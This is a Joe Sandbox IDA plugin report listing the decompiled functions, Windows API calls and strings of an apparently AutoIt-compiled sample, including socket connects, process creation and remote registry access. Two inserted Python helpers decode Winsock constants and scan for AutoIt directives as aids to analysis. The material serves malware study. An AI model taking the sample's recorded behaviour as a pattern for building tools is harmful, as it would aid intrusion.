                                                                          • Opcode Fuzzy Hash: 88132146206fedec159393e4f4b260bcb183f11f966962e4526fbc53a5a98f0b
                                                                          • Instruction Fuzzy Hash: 5231EF71901109BFEF169F94DC89EFFB7BCEF08350F00016AE512E2251E6755E899AA0
                                                                          APIs
                                                                          • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 003962EC
                                                                          • GetWindowLongW.USER32(01146948,000000F0), ref: 0039631F
                                                                          • GetWindowLongW.USER32(01146948,000000F0), ref: 00396354
                                                                          • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 00396386
                                                                          • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 003963B0
                                                                          • GetWindowLongW.USER32(00000000,000000F0), ref: 003963C1
                                                                          • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 003963DB
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                           • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: LongWindow$MessageSend
                                                                          • String ID:
                                                                          • API String ID: 2178440468-0
                                                                          • Opcode ID: 2656fe3ed591ba0f21b6521c668b4770c103d89958769007fb1c66ac9fb5a266
                                                                          • Instruction ID: e1e766ab9633c54071e1dde026774d9b11a1462667c00b79ce98fb40f45f9834
                                                                          • Opcode Fuzzy Hash: 2656fe3ed591ba0f21b6521c668b4770c103d89958769007fb1c66ac9fb5a266
                                                                          • Instruction Fuzzy Hash: F531F2386462509FDB228F19ECC6F6937E9BB4A714F1A01A5F501CF2B1CB72A840AB50
                                                                          APIs
                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0036DB2E
                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0036DB54
                                                                          • SysAllocString.OLEAUT32(00000000), ref: 0036DB57
                                                                          • SysAllocString.OLEAUT32(?), ref: 0036DB75
                                                                          • SysFreeString.OLEAUT32(?), ref: 0036DB7E
                                                                          • StringFromGUID2.OLE32(?,?,00000028), ref: 0036DBA3
                                                                          • SysAllocString.OLEAUT32(?), ref: 0036DBB1
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                           • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                          • String ID:
                                                                          • API String ID: 3761583154-0
                                                                          • Opcode ID: 5488497e6f918d98c154849bd18c5b32f345eb229d228f38f06136bffe2565ab
                                                                          • Instruction ID: f8a4b6ac25bb2e3d03626c6aa9ccb8b1f8767604097102eefcd5600b5b38bcac
                                                                          • Opcode Fuzzy Hash: 5488497e6f918d98c154849bd18c5b32f345eb229d228f38f06136bffe2565ab
                                                                          • Instruction Fuzzy Hash: 4021A436B00219AFDF11EFA9DC88CBB77ACEB09360B058566F914DB254DA71DC4187A4
                                                                          APIs
                                                                            • Part of subcall function 00387D8B: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00387DB6
                                                                          • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 003861C6
                                                                          • WSAGetLastError.WSOCK32(00000000), ref: 003861D5
                                                                          • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 0038620E
                                                                          • connect.WSOCK32(00000000,?,00000010), ref: 00386217
                                                                          • WSAGetLastError.WSOCK32 ref: 00386221
                                                                          • closesocket.WSOCK32(00000000), ref: 0038624A
                                                                          • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 00386263
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                           • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorLastioctlsocket$closesocketconnectinet_addrsocket
                                                                          • String ID:
                                                                          • API String ID: 910771015-0
                                                                          • Opcode ID: d0ae3156d4c48800d808c712a299ed00c8b3dac421b5927c0078658bac77ab31
                                                                          • Instruction ID: 8a820e7338239383a85b0495413f519b1bff04e4a4da8ed65d752307ec004671
                                                                          • Opcode Fuzzy Hash: d0ae3156d4c48800d808c712a299ed00c8b3dac421b5927c0078658bac77ab31
                                                                          • Instruction Fuzzy Hash: 1131B531600208AFDF12AF64CC8ABBD77ADEF45751F1444AAFD05EB291CB71AD448B61
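The function above is the usual non-blocking TCP connect idiom: `socket(2, 1, 6)` opens an AF_INET / SOCK_STREAM / IPPROTO_TCP socket, `ioctlsocket` with command `8004667E` (FIONBIO) switches it to non-blocking mode, `connect` is issued and `WSAGetLastError` is consulted (a non-blocking connect normally returns WSAEWOULDBLOCK and completes later), the socket is closed on failure, and a second FIONBIO call restores the previous mode. The Python helper below is an added example, not part of the Joe Sandbox report; it decodes the raw argument values that appear in such API listings by reconstructing the Winsock `_IOR`/`_IOW` bit layout, so an analyst can name the ioctl and the socket triple without looking them up. The `CALLS` list is constructed from the values shown in this listing; the argp value of the ioctl is not visible in the listing (only its pointer is), so only the command code is decoded.

```python
# Winsock ioctl command layout (winsock2.h): direction flags in the top bits,
# parameter size in bits 16..22, the group character in bits 8..15 and the
# command number in the low byte.
IOC_VOID = 0x20000000
IOC_OUT = 0x40000000
IOC_IN = 0x80000000
IOCPARM_MASK = 0x7F


def _ior(group: str, num: int, size: int = 4) -> int:
    """Equivalent of the _IOR(x, y, u_long) macro."""
    return IOC_OUT | ((size & IOCPARM_MASK) << 16) | (ord(group) << 8) | num


def _iow(group: str, num: int, size: int = 4) -> int:
    """Equivalent of the _IOW(x, y, u_long) macro."""
    return IOC_IN | ((size & IOCPARM_MASK) << 16) | (ord(group) << 8) | num


# Commands an analyst meets most often, rebuilt from their macro definitions.
IOCTL_NAMES = {
    _ior("f", 127): "FIONREAD",    # 0x4004667F
    _iow("f", 126): "FIONBIO",     # 0x8004667E  (non-zero *argp => non-blocking)
    _iow("f", 125): "FIOASYNC",    # 0x8004667D
    _ior("s", 7): "SIOCATMARK",    # 0x40047307
}

AF = {2: "AF_INET", 23: "AF_INET6"}
SOCK_TYPE = {1: "SOCK_STREAM", 2: "SOCK_DGRAM", 3: "SOCK_RAW"}
PROTO = {0: "IPPROTO_IP", 6: "IPPROTO_TCP", 17: "IPPROTO_UDP"}

# Error codes WSAGetLastError returns around a non-blocking connect.
WSA_ERRORS = {
    10035: "WSAEWOULDBLOCK",   # expected right after a non-blocking connect()
    10060: "WSAETIMEDOUT",
    10061: "WSAECONNREFUSED",
}


def decode_socket_args(af: int, typ: int, proto: int) -> tuple:
    """Name the socket() triple, falling back to the raw number."""
    return (AF.get(af, f"af={af}"),
            SOCK_TYPE.get(typ, f"type={typ}"),
            PROTO.get(proto, f"proto={proto}"))


def decode_ioctl(cmd: int) -> tuple:
    """Split a Winsock ioctl code into (name, direction, group, number, param_size)."""
    if cmd & IOC_IN:
        direction = "in"
    elif cmd & IOC_OUT:
        direction = "out"
    else:
        direction = "void"
    size = (cmd >> 16) & IOCPARM_MASK
    group = chr((cmd >> 8) & 0xFF)
    num = cmd & 0xFF
    return IOCTL_NAMES.get(cmd, "unknown"), direction, group, num, size


def connect_outcome(wsa_error: int) -> str:
    """Interpret WSAGetLastError after connect() on a non-blocking socket."""
    if wsa_error == 10035:
        return "in progress (poll with select/WSAEventSelect)"
    return WSA_ERRORS.get(wsa_error, f"failed: {wsa_error}")


# Constructed from the values in the listing above (argument columns as shown).
CALLS = [
    ("socket", (2, 1, 6)),
    ("ioctlsocket", (0x8004667E,)),
]


def decode_listing(calls=CALLS) -> list:
    out = []
    for api, args in calls:
        if api == "socket":
            out.append((api, decode_socket_args(*args)))
        elif api == "ioctlsocket":
            out.append((api, decode_ioctl(args[0])))
    return out


if __name__ == "__main__":
    for api, meaning in decode_listing():
        print(api, meaning)
```

Running `decode_listing()` names the two calls as an AF_INET/SOCK_STREAM/IPPROTO_TCP socket and a FIONBIO ioctl; the same `decode_ioctl` works for any other Winsock command code met in a listing, and `connect_outcome` gives the reading of the error value the function checks right after `connect`.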
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                           • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: __wcsnicmp
                                                                          • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                                                          • API String ID: 1038674560-2734436370
                                                                          • Opcode ID: fd9fd25c7e63c430cd30e695388fffb05bd4cb43bf1a38d01192b02933ad4d82
                                                                          • Instruction ID: b1db7b97aed63291bcba238669c5f6e3af9d2b2e851dfaf7176d06bd93652ca5
                                                                          • Opcode Fuzzy Hash: fd9fd25c7e63c430cd30e695388fffb05bd4cb43bf1a38d01192b02933ad4d82
                                                                          • Instruction Fuzzy Hash: 512149B22045116ED227BA34FC03EA7739CEF56380F11C039F8468B099EB919D82C3A5
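The function above compares its input against `#OnAutoItStartRegister`, `#notrayicon` and `#requireadmin` using `__wcsnicmp`, a case-insensitive wide-string compare. Those are AutoIt script directives that the AutoIt interpreter stub recognises, so finding all three in a PE is one of the signs that the sample is a compiled AutoIt script rather than native code. The scanner below is an added example, not part of the Joe Sandbox report; it searches a byte buffer for the three directive names case-insensitively, both as UTF-16LE (the encoding the `__wcsnicmp` call implies) and as ASCII, and reports the offset and encoding of each hit. The `SAMPLE` buffer is constructed for illustration and is not data from the analysed file.

```python
import re

# AutoIt directives the stub recognises; the report's function compares
# candidates against exactly these three.
AUTOIT_DIRECTIVES = ("#OnAutoItStartRegister", "#notrayicon", "#requireadmin")


def _patterns() -> list:
    """Case-insensitive byte regexes for each directive in UTF-16LE and ASCII."""
    pats = []
    for name in AUTOIT_DIRECTIVES:
        for enc in ("utf-16-le", "ascii"):
            pats.append((name, enc, re.compile(re.escape(name.encode(enc)), re.IGNORECASE)))
    return pats


def find_autoit_directives(data: bytes) -> dict:
    """Return {directive: [(offset, encoding), ...]} for every hit in data."""
    hits = {}
    for name, enc, pat in _patterns():
        for m in pat.finditer(data):
            hits.setdefault(name, []).append((m.start(), enc))
    return hits


def looks_autoit_compiled(data: bytes) -> bool:
    """Heuristic: all three directive names are present, in any encoding."""
    return set(find_autoit_directives(data)) == set(AUTOIT_DIRECTIVES)


# Constructed sample: filler bytes around a UTF-16LE directive table with mixed
# case, the way a wide-string table in an interpreter stub would look.
SAMPLE = (
    b"MZ\x90\x00" + b"\x00" * 16
    + "#OnAutoItStartRegister".encode("utf-16-le") + b"\x00\x00"
    + "#NoTrayIcon".encode("utf-16-le") + b"\x00\x00"
    + "#RequireAdmin".encode("utf-16-le") + b"\x00\x00"
    + b"\x00" * 8
)


def scan_file(path: str) -> dict:
    """Convenience wrapper: scan a file on disk with the same heuristic."""
    with open(path, "rb") as fh:
        return find_autoit_directives(fh.read())


if __name__ == "__main__":
    for name, where in sorted(find_autoit_directives(SAMPLE).items()):
        print(name, where)
    print("autoit-compiled:", looks_autoit_compiled(SAMPLE))
```

`scan_file("sample.exe")` applies the same check to a file; matching in UTF-16LE matters because a plain ASCII `strings` pass over the stub misses the wide-string table the comparison function reads.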
                                                                          APIs
                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0036DC09
                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0036DC2F
                                                                          • SysAllocString.OLEAUT32(00000000), ref: 0036DC32
                                                                          • SysAllocString.OLEAUT32 ref: 0036DC53
                                                                          • SysFreeString.OLEAUT32 ref: 0036DC5C
                                                                          • StringFromGUID2.OLE32(?,?,00000028), ref: 0036DC76
                                                                          • SysAllocString.OLEAUT32(?), ref: 0036DC84
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                           • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                          • String ID:
                                                                          • API String ID: 3761583154-0
                                                                          • Opcode ID: 43aa93641b597fa0ee176b22a30c0cbb85b8c5ee1f43f1c16434b832f454d2c5
                                                                          • Instruction ID: 97c3689dad6f0e5200b630286789cdf729a873a9a53b70d0f4527517c9b9d575
                                                                          • Opcode Fuzzy Hash: 43aa93641b597fa0ee176b22a30c0cbb85b8c5ee1f43f1c16434b832f454d2c5
                                                                          • Instruction Fuzzy Hash: F0218335704208AFDB15EFA9DC88DAB77ECEB09360B11C126F914CB264DAB1DC41CB64
                                                                          APIs
                                                                            • Part of subcall function 00311D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00311D73
                                                                            • Part of subcall function 00311D35: GetStockObject.GDI32(00000011), ref: 00311D87
                                                                            • Part of subcall function 00311D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00311D91
                                                                          • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00397632
                                                                          • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 0039763F
                                                                          • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 0039764A
                                                                          • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00397659
                                                                          • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00397665
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                           • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: MessageSend$CreateObjectStockWindow
                                                                          • String ID: Msctls_Progress32
                                                                          • API String ID: 1025951953-3636473452
                                                                          • Opcode ID: 5da777c71d0dc6c440ace1c30eaf7df3c7b3a07e0f29c7743f5349ec65431ec9
                                                                          • Instruction ID: 75248dbd220df2302c8ab4748b9fd21f7b6f062d742bf64507a1a1b31b5c5df4
                                                                          • Opcode Fuzzy Hash: 5da777c71d0dc6c440ace1c30eaf7df3c7b3a07e0f29c7743f5349ec65431ec9
                                                                          • Instruction Fuzzy Hash: 1611B2B2110219BFEF168F64CC85EE7BF6DEF08798F114115BA44A60A0CA729C21DBA4
                                                                          APIs
                                                                          • __init_pointers.LIBCMT ref: 00339AE6
                                                                            • Part of subcall function 00333187: EncodePointer.KERNEL32(00000000), ref: 0033318A
                                                                            • Part of subcall function 00333187: __initp_misc_winsig.LIBCMT ref: 003331A5
                                                                            • Part of subcall function 00333187: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00339EA0
                                                                            • Part of subcall function 00333187: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00339EB4
                                                                            • Part of subcall function 00333187: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00339EC7
                                                                            • Part of subcall function 00333187: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00339EDA
                                                                            • Part of subcall function 00333187: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00339EED
                                                                            • Part of subcall function 00333187: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 00339F00
                                                                            • Part of subcall function 00333187: GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 00339F13
                                                                            • Part of subcall function 00333187: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 00339F26
                                                                            • Part of subcall function 00333187: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 00339F39
                                                                            • Part of subcall function 00333187: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 00339F4C
                                                                            • Part of subcall function 00333187: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 00339F5F
                                                                            • Part of subcall function 00333187: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 00339F72
                                                                            • Part of subcall function 00333187: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 00339F85
                                                                            • Part of subcall function 00333187: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 00339F98
                                                                            • Part of subcall function 00333187: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 00339FAB
                                                                            • Part of subcall function 00333187: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 00339FBE
                                                                          • __mtinitlocks.LIBCMT ref: 00339AEB
                                                                          • __mtterm.LIBCMT ref: 00339AF4
                                                                            • Part of subcall function 00339B5C: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,00339AF9,00337CD0,003CA0B8,00000014), ref: 00339C56
                                                                            • Part of subcall function 00339B5C: _free.LIBCMT ref: 00339C5D
                                                                            • Part of subcall function 00339B5C: DeleteCriticalSection.KERNEL32(02=,?,?,00339AF9,00337CD0,003CA0B8,00000014), ref: 00339C7F
                                                                          • __calloc_crt.LIBCMT ref: 00339B19
                                                                          • __initptd.LIBCMT ref: 00339B3B
                                                                          • GetCurrentThreadId.KERNEL32 ref: 00339B42
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                           • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: AddressProc$CriticalDeleteSection$CurrentEncodeHandleModulePointerThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm_free
                                                                          • String ID:
                                                                          • API String ID: 3567560977-0
                                                                          • Opcode ID: a73953be600c03795f59c264d44283b69f61bb89b7896969a5ad478dc69ae719
                                                                          • Instruction ID: 1e2c8dd14639309041a8223a30a84b927f5919ba1f1f4a1f48219fefee272b34
                                                                          • Opcode Fuzzy Hash: a73953be600c03795f59c264d44283b69f61bb89b7896969a5ad478dc69ae719
                                                                          • Instruction Fuzzy Hash: 44F06D32609721DAE6277774BC83B8A76949F02734F214A1BF460CD0E2EFA0944142A0
                                                                          APIs
                                                                          • _memset.LIBCMT ref: 0039B644
                                                                          • _memset.LIBCMT ref: 0039B653
                                                                          • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,003D6F20,003D6F64), ref: 0039B682
                                                                          • CloseHandle.KERNEL32 ref: 0039B694
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: _memset$CloseCreateHandleProcess
                                                                          • String ID: o=$do=
                                                                          • API String ID: 3277943733-675366838
                                                                          • Opcode ID: 35f9f5ad3b98938562aa74ccce71afc5c96a8cc0f9dd1c4ba1f1ddb38b4a7b99
                                                                          • Instruction ID: c07a42acf0bddf7a0af25ca1a70ca71bbd30476f34e7d624558029e85e123fdf
                                                                          • Opcode Fuzzy Hash: 35f9f5ad3b98938562aa74ccce71afc5c96a8cc0f9dd1c4ba1f1ddb38b4a7b99
                                                                          • Instruction Fuzzy Hash: F0F05EB66417047FE3122771BC47FBB7B9CEB08395F004022FA19E91A2D7765C0087A8
                                                                          APIs
                                                                          • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,00333F85), ref: 00334085
                                                                          • GetProcAddress.KERNEL32(00000000), ref: 0033408C
                                                                          • EncodePointer.KERNEL32(00000000), ref: 00334097
                                                                          • DecodePointer.KERNEL32(00333F85), ref: 003340B2
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                                                          • String ID: RoUninitialize$combase.dll
                                                                          • API String ID: 3489934621-2819208100
                                                                          • Opcode ID: bacd67001e7b97d3f025d321868291590d9b333f6e220b60e007814c5b872ea4
                                                                          • Instruction ID: 5c64e6f247fedcc6e53886cab0dd74db0e9fa94c9b2a7746e662558151f1ca8e
                                                                          • Opcode Fuzzy Hash: bacd67001e7b97d3f025d321868291590d9b333f6e220b60e007814c5b872ea4
                                                                          • Instruction Fuzzy Hash: 6EE09274682202AFEB13AF65EC49B467BACB704742F104426F111F10A0CBB79A048B16
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: _memmove$__itow__swprintf
                                                                          • String ID:
                                                                          • API String ID: 3253778849-0
                                                                          • Opcode ID: c9e1620ce3bba5a047f8eccdd8e9848ec028c7919196af9f49fd1319a3b40909
                                                                          • Instruction ID: 473c8cb615a51cfc159563b96bb9544d8035a733fc63bfc300dc52e4658a11a0
                                                                          • Opcode Fuzzy Hash: c9e1620ce3bba5a047f8eccdd8e9848ec028c7919196af9f49fd1319a3b40909
                                                                          • Instruction Fuzzy Hash: D6618D30500A5A9BCF1BEF64CCA2EFE37A9AF09308F448519F8595F192DB38E945CB50
                                                                          APIs
                                                                            • Part of subcall function 00317DE1: _memmove.LIBCMT ref: 00317E22
                                                                            • Part of subcall function 00390E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0038FDAD,?,?), ref: 00390E31
                                                                          • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 003902BD
                                                                          • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 003902FD
                                                                          • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 00390320
                                                                          • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 00390349
                                                                          • RegCloseKey.ADVAPI32(?,?,00000000), ref: 0039038C
                                                                          • RegCloseKey.ADVAPI32(00000000), ref: 00390399
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
                                                                          • String ID:
                                                                          • API String ID: 4046560759-0
                                                                          • Opcode ID: b96e7b9b750119d3c850326715a24943475c1bbeb3ea0ea8da2c1308ec007d18
                                                                          • Instruction ID: 0468b132636d46406677ceb91599d2acb07261d5b50d281536081c8ea0f27e6a
                                                                          • Opcode Fuzzy Hash: b96e7b9b750119d3c850326715a24943475c1bbeb3ea0ea8da2c1308ec007d18
                                                                          • Instruction Fuzzy Hash: EC513E312082049FCB1AEF64C895EAFBBE9FF89314F04491DF5958B2A1DB31D945CB52
                                                                          APIs
                                                                          • GetMenu.USER32(?), ref: 003957FB
                                                                          • GetMenuItemCount.USER32(00000000), ref: 00395832
